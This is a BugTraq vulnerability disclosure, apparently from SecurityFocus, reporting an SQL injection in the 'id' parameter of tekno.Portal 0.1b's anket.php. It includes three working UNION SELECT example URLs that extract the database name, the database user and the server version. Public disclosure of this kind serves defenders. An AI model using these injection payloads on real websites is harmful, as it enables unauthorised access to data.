BugTraq
tekno.Portal 0.1b - SQLi Vulnerability in "anket.php" Jul 26 2012 12:21AM
Socket_0x03 teraexe com
________________________________________________________________________
____________

################################################################
# Title: tekno.Portal 0.1b - SQLi Vulnerability in "anket.php" #
################################################################

Date: [07-25-2012]

Author: Socket_0x03 (Alvaro J. Gene)

Email: Socket_0x03 (at) teraexe (dot) com [email concealed]

Website: www.teraexe.com

________________________________________________________________________
____________

Vulnerable Application: tekno.Portal

Version: 0.1b

File: anket.php

________________________________________________________________________
____________

SQL Injection:
http://www.website.com/teknoportal/anket.php?id=[SQLi]

Example of SQLi:
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,da
tabase(),5
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,us
er(),5
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@
version,5

________________________________________________________________________
____________

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus